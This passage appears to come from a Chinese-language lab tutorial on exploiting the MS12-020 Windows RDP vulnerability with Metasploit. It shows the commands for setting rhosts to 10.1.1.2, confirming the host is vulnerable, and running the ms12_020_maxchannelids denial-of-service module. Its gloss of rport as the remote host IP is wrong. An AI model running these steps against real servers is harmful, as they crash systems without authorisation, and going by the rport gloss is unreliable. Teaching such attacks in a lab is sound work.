4,对验证模块进行参数设置,从上图看到默认的参数设置是不完全正确的,所以 set rhosts 10.1.1.2
[*参数注释:rhosts 设置需要进行漏洞验证的主机IP /rport 远程主机IP] ,
然后 run 开始进行漏洞验证,可以看见 The target is vulnerable. 表明漏洞有很大可能是存在的
5,证实了漏洞存在的可能,现在调用漏洞利用模块进行漏洞利用,先 search ms12_020,
然后 use 0 或 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids,
再次查看漏洞利用的参数设置:show options ,可以看见rhosts参数默认为空,设置漏洞利用主机ip:set rhosts 10.1.1.2,
然后 run 执行漏洞利用